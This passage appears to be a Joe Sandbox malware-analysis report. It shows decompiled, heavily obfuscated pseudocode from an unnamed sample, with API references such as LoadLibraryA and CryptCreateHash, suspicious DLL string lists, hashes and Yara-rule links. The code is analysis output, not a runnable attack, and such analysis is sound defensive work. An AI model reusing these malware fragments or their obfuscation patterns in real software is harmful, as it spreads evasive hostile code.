						 *0x508176 =  *0x508176 - _t165;
						 *0x508194 =  *0x508194 + _t165;
						_t170 = (_t170 & 0x007afb40) + 0x820d83;
						 *0x50afe1 = _t104;
					}
					 *0x50835d =  *0x50835d - _t187; // executed
					_t105 = FindCloseChangeNotification(??); // executed
					 *0x5081e4 = _t170;
					 *(_t191 - 8) = _t105;
					_t118 = 0x45;
					_t107 =  *(_t191 - 8);
					 *((intOrPtr*)(_t191 - 0x14)) = 0;
					if(_t165 >= _t165) {
						L16:
						goto L17;
					} else {
						 *0x5081b4 = _t170;
						 *0x50afe1 = _t107;
						if(_t107 == 0) {
							L17:
							 *0x50856f = _t107;
							_t118 = 0x28efc3;
							 *0x50afda =  *0x50afda - 0x28efc3;
							L18:
							_t82 = 1;
							goto L21;
						}
						if(_t187 <= 0) {
							goto L18;
						}
						goto L16;
					}
				} else {
					if(_t132 <= _t132) {
						L9:
						_t147 = 0xe3;
						 *0x5086df =  *0x5086df;
						L10:
						_t132 = _t147 - 3;
						goto L11;
					}
					_t147 = 0x488b92;
					 *((intOrPtr*)(_t191 - 0x14)) =  *((intOrPtr*)(_t191 - 0x14)) - _t165;
					_t167 = E00508174; // 0x28a9
					_t165 = _t167 - 0x784f;
					 *0x5081c4 =  *0x5081c4 - 0x8031;
					_t170 = 0x10062;
					if(0x8031 > 0) {
						goto L10;
					}
					_t187 = _t187 | 0x0000af80;
					 *0x50afe1 =  &(( *0x50afe1)[_t104]);
					goto L9;
				}
			}

























                                                          0x004b298d
                                                          0x004b298d
                                                          0x004b298d
                                                          0x004b2990
                                                          0x004b2996
                                                          0x004b29a5
                                                          0x004b29a8
                                                          0x004b29af
                                                          0x004b2b99
                                                          0x004b2bb1
                                                          0x004b2bd5
                                                          0x004b2bed
                                                          0x004b2bf8
                                                          0x004b2bff
                                                          0x004b2dbd
                                                          0x004b2dc8
                                                          0x004b2dd8
                                                          0x004b2ddf
                                                          0x004b2de7
                                                          0x004b2de9
                                                          0x004b2de9
                                                          0x004b2de7
                                                          0x004b2df1
                                                          0x004b2df5
                                                          0x004b2dfe
                                                          0x004b2e07
                                                          0x004b2e0d
                                                          0x004b2e14
                                                          0x004b2e17
                                                          0x004b2e22
                                                          0x004b2e2a
                                                          0x004b2e39
                                                          0x004b2e4c
                                                          0x004b2e4c
                                                          0x004b2e53
                                                          0x004b2e5b
                                                          0x004b2e60
                                                          0x004b2e65
                                                          0x004b2e6a
                                                          0x004b2e6d
                                                          0x004b2e74
                                                          0x004b2e7e
                                                          0x004b2e87
                                                          0x004b2e89
                                                          0x004b2e8f
                                                          0x004b2e91
                                                          0x004b2e97
                                                          0x004b2ea4
                                                          0x004b2eb2
                                                          0x004b2eb5
                                                          0x004b2ebe
                                                          0x004b2ec8
                                                          0x004b2ed2
                                                          0x004b2ed2
                                                          0x004b2c05
                                                          0x004b2c0d
                                                          0x004b2c10
                                                          0x004b2c11
                                                          0x004b2c12
                                                          0x004b2c13
                                                          0x004b2c18
                                                          0x004b2c1d
                                                          0x004b2c1d
                                                          0x004b29b5
                                                          0x004b29bb
                                                          0x004b29c0
                                                          0x004b29cc
                                                          0x004b29dd
                                                          0x004b29e4
                                                          0x004b29e7
                                                          0x004b29f5
                                                          0x004b29f9
                                                          0x004b2a00
                                                          0x004b2a03
                                                          0x004b2a03
                                                          0x004b2a0a
                                                          0x004b2a0c
                                                          0x004b2a16
                                                          0x004b2a23
                                                          0x004b2a34
                                                          0x004b2a34
                                                          0x004b2a3b
                                                          0x004b2a48
                                                          0x004b2a4b
                                                          0x004b2a53
                                                          0x004b2a5a
                                                          0x004b2a5b
                                                          0x004b2a5e
                                                          0x004b2a64
                                                          0x004b2a6c
                                                          0x004b2a72
                                                          0x004b2ac6
                                                          0x004b2acc
                                                          0x004b2ae7
                                                          0x004b2aed
                                                          0x004b2af4
                                                          0x004b2b01
                                                          0x004b2b07
                                                          0x004b2b07
                                                          0x004b2b17
                                                          0x004b2b1e
                                                          0x004b2b24
                                                          0x004b2b2b
                                                          0x004b2b37
                                                          0x004b2b3a
                                                          0x004b2b3d
                                                          0x004b2b42
                                                          0x004b2b68
                                                          0x00000000
                                                          0x004b2b44
                                                          0x004b2b47
                                                          0x004b2b5a
                                                          0x004b2b62
                                                          0x004b2b6b
                                                          0x004b2b73
                                                          0x004b2b7e
                                                          0x004b2b83
                                                          0x004b2b8b
                                                          0x004b2b8b
                                                          0x00000000
                                                          0x004b2b8b
                                                          0x004b2b66
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004b2b66
                                                          0x004b2a74
                                                          0x004b2a76
                                                          0x004b2ab1
                                                          0x004b2ab7
                                                          0x004b2ab9
                                                          0x004b2ac3
                                                          0x004b2ac3
                                                          0x00000000
                                                          0x004b2ac3
                                                          0x004b2a78
                                                          0x004b2a7d
                                                          0x004b2a83
                                                          0x004b2a8a
                                                          0x004b2a93
                                                          0x004b2a9a
                                                          0x004b2aa1
                                                          0x00000000
                                                          0x00000000
                                                          0x004b2aa3
                                                          0x004b2aa9
                                                          0x00000000
                                                          0x004b2aaf

                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 004B2B1E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID: $9$B5d$EtwEventWriteStartScenario$LookupPrivilegeValueA$PenIMC_v0400.dll$WindowsCodecs.dll$api-ms-win-core-rtlsupport-l1-1-0.dll$ddrawex.dll$e6$wmi.dll$xmllite.dll$V;
                                                          • API String ID: 2591292051-4056405076
                                                          • Opcode ID: ce372821e85e69430d5d910ed6b406007421b2e5bad2cf04427e3ac0a192bbef
                                                          • Instruction ID: 7c6f6c4814ddfa45a8eb8d528c7ad84f763cab7e9ecc0dadf1858dd0c6515584
                                                          • Opcode Fuzzy Hash: ce372821e85e69430d5d910ed6b406007421b2e5bad2cf04427e3ac0a192bbef
                                                          • Instruction Fuzzy Hash: BCA1ADB5E443069FCB00DFB9D894AEEBBB0FB38310F44416AD844E7752D6780A4AD755
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00469F68 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 85libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 33 469f68-46a005 34 46a007-46a015 33->34 35 46a018-46a0a1 LoadLibraryA 33->35 34->35
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?), ref: 0046A026
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: 7-"$EnumWindowStationsA$RtlEthernetStringToAddressW$SystemPropertiesComputerName.exe$WcnEapAuthProxy.dll$nshhttp.dll$wlanmsm.dll$wmi.dll
                                                          • API String ID: 1029625771-4078750143
                                                          • Opcode ID: 92e9af6b17e92157de21319807b1534378470bf3899f357b9b9a6b35d96fee7d
                                                          • Instruction ID: c008f100a7b466feeee12ba50e682fed69aab6b0f8a747ef4b9ccaaf5347e6ed
                                                          • Opcode Fuzzy Hash: 92e9af6b17e92157de21319807b1534378470bf3899f357b9b9a6b35d96fee7d
                                                          • Instruction Fuzzy Hash: 2E314D74B5070AABCB00DFA8E8D5ADD7BF0FB28320F1040B9A544EB752E6755A49DB06
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00469A47 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 294 469a47-469a4a 295 469a52-469a86 294->295 296 469a4c 294->296 297 469aa4-469af1 LoadLibraryA 295->297 298 469a88-469a9d 295->298 296->295 298->297
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?), ref: 00469ABA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: 4
                                                          • API String ID: 1029625771-4088798008
                                                          • Opcode ID: 42e16af78128252f58ca7e93dbd5f69779be7f5cdd364aa5d4ce96d28c2f122e
                                                          • Instruction ID: eebe5dbae67eddba5e3c7071b305676587c3d350f0af83ae0408f3cf53fbd3f4
                                                          • Opcode Fuzzy Hash: 42e16af78128252f58ca7e93dbd5f69779be7f5cdd364aa5d4ce96d28c2f122e
                                                          • Instruction Fuzzy Hash: BD014578E44345AFEB00DFB4DC997EC7FB0EF28300F20806A9946A7391E6780A05DB09
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0050492E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 299 50492e-50493b 300 50496b-504981 ExitProcess 299->300 301 50493d-504954 299->301 302 504956 301->302 303 504958-50495b 301->303 302->303 304 504965 303->304 305 50495d-504960 303->305 304->300 305->304
                                                          C-Code - Quality: 100%
                                                          			E0050492E() {
				char _t4;
				signed int _t5;
				signed int _t8;
				signed short _t12;
				signed int _t15;

				 *0x50afdf =  *0x50afdf + _t12;
				if((_t12 & 0x0000907b) <= 0) {
					_t8 =  *0x50afe1; // -128
					 *0x50afe3 = _t4;
					if(_t15 >= 0) {
						_t15 =  !_t15;
					}
					if(_t15 >= 0) {
						_t8 = "wmi.dll";
					}
					_t5 = _t8 & 0x002da9ad;
				}
				 *0x5080f4 =  *0x5080f4 - _t5 + 0x3acd;
				 *0x508537 =  *0x508537 - _t4; // executed
				ExitProcess(0);
			}








                                                          0x00504930
                                                          0x0050493b
                                                          0x00504940
                                                          0x00504946
                                                          0x00504954
                                                          0x00504956
                                                          0x00504956
                                                          0x0050495b
                                                          0x00504960
                                                          0x00504960
                                                          0x00504965
                                                          0x00504965
                                                          0x00504971
                                                          0x0050497b
                                                          0x00504981

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID: wmi.dll
                                                          • API String ID: 621844428-378833482
                                                          • Opcode ID: 022ca020a66c06748da2aeed5f516e7d73faff2430de42b941ddf2cded9b3ddc
                                                          • Instruction ID: 122a8f836d5055b0b18aae3166350b7fa95a1c627136e6a0cea81362c986e5d6
                                                          • Opcode Fuzzy Hash: 022ca020a66c06748da2aeed5f516e7d73faff2430de42b941ddf2cded9b3ddc
                                                          • Instruction Fuzzy Hash: E5E068F90147834AC7019B387C5DC9F3F61E7B9790309163A89D18315AE51304086746
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004AFEEF Relevance: 1.3, APIs: 1, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E004AFEEF(void* __ebx, intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				intOrPtr _v12;
				CHAR* _v16;
				void* __ebp;
				long _t14;
				CHAR* _t15;
				void* _t20;

				_v16 = 0;
				_t14 = _a8 + _a8;
				_v8 = _t14;
				_v12 = _t14;
				_push(_v12);
				_t15 = E004A80E0(_t14, __ebx, _t20); // executed
				_v16 = _t15;
				L004AFE7F(_v16, _a4, _a8);
				CharUpperBuffA(_v16, _v8); // executed
				return _v16;
			}










                                                          0x004afef5
                                                          0x004afeff
                                                          0x004aff01
                                                          0x004aff04
                                                          0x004aff07
                                                          0x004aff0a
                                                          0x004aff0f
                                                          0x004aff1b
                                                          0x004aff26
                                                          0x004aff30

                                                          APIs
                                                          • CharUpperBuffA.USER32(00000000,?,?), ref: 004AFF26
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID:
                                                          • API String ID: 3964851224-0
                                                          • Opcode ID: ab227a7f053a98a651e34f48330d718ae13e0a23de29143f5016cdb95e4e37d9
                                                          • Instruction ID: 09f68744fee8e61ca9e5a70f2bade2b4d37b6c5a1ab70de6c818ee14dc65e68a
                                                          • Opcode Fuzzy Hash: ab227a7f053a98a651e34f48330d718ae13e0a23de29143f5016cdb95e4e37d9
                                                          • Instruction Fuzzy Hash: 4EF0AE71C00108BFCF019FA9DC41A8EBBB1EF14318F10C1A9A824A6261D7368A24EF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00506BC0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00506BC0(int __edx) {
				void* _t1;

				if(__edx != 0) {
					_t1 = malloc(__edx); // executed
					return _t1;
				} else {
					return 0;
				}
			}




                                                          0x00506bc2
                                                          0x00506bc8
                                                          0x00506bd0
                                                          0x00506bc4
                                                          0x00506bc6
                                                          0x00506bc6

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: malloc
                                                          • String ID:
                                                          • API String ID: 2803490479-0
                                                          • Opcode ID: 98684c3b5df8c63e5d034182714e5b84b52da44d776c3cf739622103f4d23545
                                                          • Instruction ID: 120f65901945ea55295756b376a65ff461912b5ae038a2b02e5a620be8355149
                                                          • Opcode Fuzzy Hash: 98684c3b5df8c63e5d034182714e5b84b52da44d776c3cf739622103f4d23545
                                                          • Instruction Fuzzy Hash: E8A011CCE2008000EA082032280202B202232E0B0BBE8C8B8A800A00A8FE38C22C200A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 004B3560 Relevance: 28.4, APIs: 1, Strings: 15, Instructions: 378encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CryptCreateHash.ADVAPI32(?,00008003,?,00000000,?,00000001), ref: 004B37DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: CreateCryptHash
                                                          • String ID: =y'$AddInUtil.exe$CNHMWL.dll$EtwEventWriteStartScenario$LookupPrivilegeValueA$MC<$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$SystemPropertiesComputerName.exe$WSearchMigPlugin.dll$api-ms-win-core-sysinfo-l1-1-0.dll$credssp.dll$nshhttp.dll$wmi.dll$xmllite.dll$|N/
                                                          • API String ID: 4184778727-312422330
                                                          • Opcode ID: e6ce1651b08c16efbda1a1b75fb3409e0ca62c914dc7628668755d74ecd62c3d
                                                          • Instruction ID: f978c27ccb293639b5c9a463bd7e54085e7c2cbb5712191480944531a725995a
                                                          • Opcode Fuzzy Hash: e6ce1651b08c16efbda1a1b75fb3409e0ca62c914dc7628668755d74ecd62c3d
                                                          • Instruction Fuzzy Hash: 63E1F0B9E043469FCB00DFB9D894ADE7FB1EB3A310F04806AD984E7752D2780A49DB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004F210A Relevance: 18.1, Strings: 14, Instructions: 621COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E004F210A(void* __ebx) {
				void* _t77;
				signed int _t78;
				signed int _t85;
				signed int _t86;
				signed int _t88;
				intOrPtr _t89;
				signed char _t90;
				signed int _t91;
				signed int _t92;
				void* _t93;
				signed int _t98;
				void* _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t107;
				signed int _t108;
				signed int _t110;
				void* _t171;
				signed int _t212;
				void* _t221;
				intOrPtr _t232;
				intOrPtr _t234;
				void* _t235;
				intOrPtr _t273;
				short _t313;
				signed char _t314;
				signed short _t317;
				void* _t318;
				signed short _t322;
				signed char _t323;
				signed short _t324;
				signed short _t329;
				signed char _t331;
				signed short _t332;
				signed short _t333;
				intOrPtr _t342;
				void* _t343;
				signed char _t345;
				signed char _t347;
				intOrPtr _t355;
				signed short _t356;
				signed char _t357;
				short _t365;
				intOrPtr _t374;
				void* _t375;
				void* _t379;
				void* _t380;
				void* _t381;
				void* _t383;
				void* _t384;
				void* _t386;
				void* _t390;
				signed int _t391;
				void* _t398;
				void* _t406;
				void* _t409;
				void* _t421;
				signed int _t423;
				void* _t424;
				void* _t425;
				void* _t427;
				void* _t428;
				void* _t429;
				void* _t431;
				void* _t436;
				void* _t437;
				void* _t439;

				if(0xde != 0) {
					L3:
					_t342 =  *0x5081ba; // 0x510c
					L4:
					_t343 = _t342 - 0x9497;
					 *0x508206 =  *0x508206 + _t343;
					_pop(_t77);
					_pop(_t379);
					_pop(_t417);
					_t78 = _t77 +  *((intOrPtr*)(_t439 + 8));
					 *0x5081f4 = _t343 + _t343;
					_t345 =  *0x50822c; // 0x9f6d
					 *0x50afe3 = _t78;
					if(_t379 >= 0) {
						 *0x50acfc =  *0x50acfc + _t379;
					}
					_pop(_t419);
					 *(_t439 - 0x1c) = _t78;
					_t313 = 0x64b6;
					 *0x50afe5 = _t78;
					if(_t379 >= 0) {
						 *0x50aed0 =  *0x50aed0 + _t379;
						 *0x50afd8 = _t78;
						 *0x50807e =  *0x50807e + _t78;
					}
					 *0x508136 = _t313;
					_push(_t379);
					 *(_t439 - 0xc) = _t78;
					if(0xe0 < 0xe0) {
						_t313 = 0x84aa;
					}
					_pop(_t380);
					if((_t345 & 0x000000a7) < 0) {
					}
					_t381 = _t380;
					_t383 = _t381;
					_pop(_t421);
					_t314 =  *(_t439 - 8);
					_t85 =  *(_t439 - 0x84);
					 *0x50843b =  *0x50843b + _t383;
					E0050814C = _t314;
					_t347 = _t314;
					if(_t314 <= _t314) {
						 *0x509823 =  *0x509823 + _t347;
					}
					 *0x50afe3 = _t85;
					 *0x50afe6 = _t85;
					 *(_t439 - 8) = _t314;
					_t317 =  *(_t439 - 8);
					_t384 = _t383;
					_t423 = _t421;
					_t86 =  *(_t85 + 0x1c);
					 *0x50afe3 = _t86;
					_push(_t384);
					 *(_t439 - 8) = _t317;
					_t318 = _t317 - 0x79;
					_push(_t423);
					if((_t423 & 0x00a3b631) < 0) {
						L16:
						_t347 =  *0x5081c4; // 0x3542
						 *0x508210 = _t347;
						goto L17;
					} else {
						E00508174 = 0x755f;
						if(_t318 - 0x68bc > _t318 - 0x68bc) {
							L17:
							 *0x50833f =  *0x50833f - _t423;
							 *0x508daf =  *0x508daf + _t423;
							_pop(_t424);
							_pop(_t386);
							_t322 =  *(_t439 - 8);
							 *((intOrPtr*)(_t439 - 0x20)) = _t86 +  *((intOrPtr*)(_t439 + 8));
							_t88 =  *(_t439 - 0x84);
							 *(_t439 - 8) = _t322;
							if(_t322 <= _t322) {
								if(_t322 < _t322) {
								}
								 *0x5081e0 = _t347;
								_t347 =  *0x508210; // 0x19f4
							}
							 *0x50afe3 = _t88;
							_t323 =  *(_t439 - 8);
							_t89 =  *((intOrPtr*)(_t88 + 0x14));
							 *0x50853f =  *0x50853f + _t89;
							_t90 = _t89 + 1;
							if((_t90 & 0x000000b5) == 0) {
								 *0x50afe3 = _t90;
							}
							_push(_t386);
							if(_t386 < 0) {
								L27:
								if((_t347 & 0x0000009e) == 0) {
									goto L29;
								}
								goto L28;
							} else {
								if(_t90 >= 0xc50b4) {
									L26:
									 *0x5081b8 = 0x7c1d;
									_t347 = 0xf83a;
									goto L27;
								}
								 *0x50afd9 =  *0x50afd9 + _t90;
								if(0x1e65 < 0x2e) {
									L28:
									if((_t347 & 0x0099bde0) <= 0) {
										L30:
										_pop(_t390);
										_t91 = _t90 + _t90;
										if(_t390 != 0) {
											 *0x50818c = _t323;
											_t374 =  *0x5081c2; // 0x8a5b
											_t375 = _t374 - 0x99;
											 *0x50820c =  *0x50820c - _t375;
											_t347 = _t375 + _t375;
											 *0x50afe3 = _t91;
										}
										 *0x508b0f =  *0x508b0f + (0xf2 >> _t323) - _t91 + 0x1b;
										_t391 = _t390;
										 *(_t439 - 0x7c) = _t91;
										_push(_t424);
										 *0x50afe3 = _t91;
										_push(_t391);
										 *(_t439 - 8) = _t323;
										_t425 = _t424 + 0xc385;
										_t92 = _t91;
										_t393 = (_t391 & 0x000000df) - 0xd2b725;
										_t171 = 0xff;
										if((_t391 & 0x000000df) - 0xd2b725 == 0x757) {
											 *0x50afda =  *0x50afda - 0x22de8c;
											_t171 = 0x4d4c1a;
											_t323 = _t323 + _t323 - 0x7d9b;
											 *0x5081ec = _t347;
											if((_t347 & 0x000000a8) != 0) {
												 *0x50afe3 = _t92;
											}
										}
										 *0x50a64e =  *0x50a64e + _t425;
										_t93 = _t92;
										E004AE02F(_t93, _t171 - 0xe1, _t323, _t347, _t393, _t425, 1);
										_t427 = _t93;
										_t324 =  *(_t439 - 8);
										_t98 =  *(_t439 - 0x84);
										 *0x508178 = _t324;
										_push(0);
										 *0x50840f = _t98;
										 *(_t439 - 8) = _t324;
										 *0x5081ce = _t347;
										_pop(_t398);
										_t428 = _t427;
										_t329 =  *(_t439 - 8);
										 *(_t439 - 0x78) =  *((intOrPtr*)(_t98 + 0x14)) + 1 << 2;
										 *0x508160 =  *0x508160 - _t329;
										_push(_t428);
										_t429 = _t398;
										 *0x508ee3 = 0xc3;
										 *(_t439 - 8) = _t329;
										 *0x50819a = _t329 - 0x596901;
										_push(0xcfbfa9);
										_push( *(_t439 - 0x84));
										_t331 =  *(_t439 - 8);
										E0050814C = _t331;
										_pop(_t103);
										_pop(_t404);
										_t431 = _t429;
										_t104 =  *((intOrPtr*)(_t103 + 0x18));
										_push(_t431);
										if(_t104 < 0) {
											_t273 =  *0x508873; // 0x50008e
											if(_t273 - 0x2f6d >> _t331 >= _t331) {
												 *0x508156 = _t331;
											}
										}
										 *0x508d5f = _t104 + 1;
										if(_t331 < _t331) {
											L42:
											goto L43;
										} else {
											if(0x92 >= 0) {
												L43:
												_t105 = _t104 + 1;
												 *0x50afe1 = _t105;
												_push(0);
												 *0x50afe6 = _t105;
												 *(_t439 - 8) = _t331;
												 *0x50817a = _t331;
												_t355 =  *0x5081cc; // 0x48e8
												_t356 = _t355 - 0x9238;
												_push(_t105);
												if(_t331 < _t331) {
													_t356 = _t356 - 0x928c0b;
													 *0x50afe1 = 0x2167e7;
												}
												_pop(_t107);
												 *0x50afe5 = _t107;
												 *0x50afe6 = _t107;
												_t108 = _t107;
												_pop(_t406);
												_pop(_t436);
												_t332 =  *(_t439 - 8);
												 *(_t439 - 0x2c) = _t108;
												 *(_t439 - 8) = _t332;
												if((_t332 & 0x00008389) == 0) {
													_t356 = _t356 + 0x9241ba;
													 *0x508238 =  *0x508238;
													 *0x50afe5 = _t108;
												}
												 *0x508573 = _t108;
												 *0x50afe6 =  *0x50afe6 + _t108;
												_t333 =  *(_t439 - 8);
												_t409 = _t406;
												_t437 = _t436;
												 *(_t439 - 0x48) = _t108;
												if(_t437 > 0) {
													L52:
													goto L53;
												} else {
													 *0x50afd8 = _t108;
													if(0xf3 + _t108 + 0x1c >= 0x34) {
														L53:
														 *0x5087ff = _t108;
														 *0x5080f6 =  *0x5080f6 + 0x3ce377;
														_t357 = _t356 + 0x636d;
														_t110 = 8 *  *(_t439 - 0x2c);
														_push(_t357);
														if((_t357 & 0x000000a8) <= 0) {
															 *0x50afd8 = _t110;
															if(8 >= 0x163567) {
															}
														}
														 *0x50afdf =  *0x50afdf + 0x7f42;
														 *0x50825c =  *0x50825c - _t437;
														_t212 = _t110;
														_pop(_t365);
														 *(_t439 - 0x74) = _t110;
														if(_t110 == 3) {
															L64:
															 *0x50afdc =  *0x50afdc - _t212;
															goto L65;
														} else {
															_t234 =  *0x5087bf; // 0x0
															 *0x50808a =  *0x50808a - _t110;
															 *0x508b33 =  *0x508b33 + _t234;
															_t235 = _t234 + _t234;
															if(_t235 == _t235) {
																if(_t235 <= _t235) {
																	 *0x508142 = _t333;
																}
																_t235 = 0x8159;
															}
															 *0x5081c8 =  *0x5081c8 - _t365;
															 *0x50afe3 = _t110;
															 *0x50afe6 = _t110;
															 *0x50afe6 = _t110;
															if("charmap.exe" + _t110 <= 0x2c) {
																L65:
																 *0x50817a =  *0x50817a - _t333;
																 *0x508198 =  *0x508198 - _t333;
																 *0x50afe0 =  *0x50afe0 - _t365;
																_push( *(_t439 - 0x74));
																_t221 = 0xe6;
																_push(_t409);
																if(_t110 < 0) {
																	 *0x508837 =  *0x508837 + _t110;
																	_t232 =  *0x508ba7; // 0x0
																	_t221 = _t232 - 0x46;
																	 *0x5080fc =  *0x5080fc + 0x9a0c;
																	 *(_t439 - 8) =  *(_t439 - 8) + _t333;
																	if(_t333 > _t333) {
																		 *0x5081b8 = _t365;
																	}
																	 *0x50afe1 = _t110;
																}
																_t222 = _t221 + 0xcf;
																 *0x50afe5 =  *0x50afe5 - _t110;
																if(_t110 == 0) {
																	L72:
																	 *0x5080b2 =  *0x5080b2 - _t222;
																	goto L73;
																} else {
																	_t222 = 7;
																	if(_t110 != 0xdb01d) {
																		L73:
																		_push(E004F2981);
																		_push(E004A80E0);
																		return _t110;
																	}
																	_t222 = _t110 - 0x2ecc;
																	goto L72;
																}
															} else {
																_t212 = 0x354e0d;
																goto L64;
															}
														}
													}
													 *0x508144 = _t333;
													_t356 = _t356 - _t333 - _t333 - 0x84;
													 *0x5081e2 = _t356;
													if((_t356 & 0x0000a175) > 0) {
														 *0x50afe3 = _t108;
													}
													 *0x5086e3 =  *0x5086e3 - _t409;
													goto L52;
												}
											}
											 *0x50afe0 =  *0x50afe0 - 0x50afdf;
											goto L42;
										}
									}
									L29:
									 *0x5086b7 =  *0x5086b7 - _t386 + _t424;
									goto L30;
								}
								goto L26;
							}
						}
						goto L16;
					}
				}
				 *0x50871f =  *0x50871f - 6;
				 *0x50afda =  *0x50afda + __ebx;
				if(__ebx < __ebx) {
					goto L4;
				}
				 *0x5093b7 =  *0x5093b7 + 0x6548;
				goto L3;
			}






































































                                                          0x004f210e
                                                          0x004f213d
                                                          0x004f213d
                                                          0x004f2144
                                                          0x004f2144
                                                          0x004f2149
                                                          0x004f2153
                                                          0x004f2154
                                                          0x004f2155
                                                          0x004f2159
                                                          0x004f2163
                                                          0x004f216d
                                                          0x004f2175
                                                          0x004f2180
                                                          0x004f2182
                                                          0x004f2182
                                                          0x004f219e
                                                          0x004f219f
                                                          0x004f21ac
                                                          0x004f21b8
                                                          0x004f21bf
                                                          0x004f21c3
                                                          0x004f21c9
                                                          0x004f21d5
                                                          0x004f21dc
                                                          0x004f21e9
                                                          0x004f21f6
                                                          0x004f21f9
                                                          0x004f2207
                                                          0x004f2211
                                                          0x004f2211
                                                          0x004f2215
                                                          0x004f2219
                                                          0x004f2219
                                                          0x004f2227
                                                          0x004f222f
                                                          0x004f2230
                                                          0x004f2234
                                                          0x004f2237
                                                          0x004f224a
                                                          0x004f226a
                                                          0x004f2271
                                                          0x004f2276
                                                          0x004f2278
                                                          0x004f2278
                                                          0x004f227f
                                                          0x004f228a
                                                          0x004f229c
                                                          0x004f22a6
                                                          0x004f22a9
                                                          0x004f22aa
                                                          0x004f22ab
                                                          0x004f22ae
                                                          0x004f22bc
                                                          0x004f22c5
                                                          0x004f22cb
                                                          0x004f22ce
                                                          0x004f22d5
                                                          0x004f2316
                                                          0x004f2316
                                                          0x004f231d
                                                          0x00000000
                                                          0x004f22d7
                                                          0x004f230b
                                                          0x004f2314
                                                          0x004f2326
                                                          0x004f232c
                                                          0x004f2333
                                                          0x004f233e
                                                          0x004f233f
                                                          0x004f234b
                                                          0x004f234e
                                                          0x004f2356
                                                          0x004f2361
                                                          0x004f2367
                                                          0x004f236b
                                                          0x004f236b
                                                          0x004f2370
                                                          0x004f237a
                                                          0x004f237a
                                                          0x004f2381
                                                          0x004f238d
                                                          0x004f2390
                                                          0x004f2393
                                                          0x004f2399
                                                          0x004f239d
                                                          0x004f239f
                                                          0x004f239f
                                                          0x004f23af
                                                          0x004f23b3
                                                          0x004f23ee
                                                          0x004f23f1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004f23b5
                                                          0x004f23ba
                                                          0x004f23cc
                                                          0x004f23e5
                                                          0x004f23ec
                                                          0x00000000
                                                          0x004f23ec
                                                          0x004f23c1
                                                          0x004f23ca
                                                          0x004f23f3
                                                          0x004f23f9
                                                          0x004f2414
                                                          0x004f241b
                                                          0x004f241e
                                                          0x004f2428
                                                          0x004f2451
                                                          0x004f2458
                                                          0x004f245f
                                                          0x004f2462
                                                          0x004f2469
                                                          0x004f2474
                                                          0x004f2474
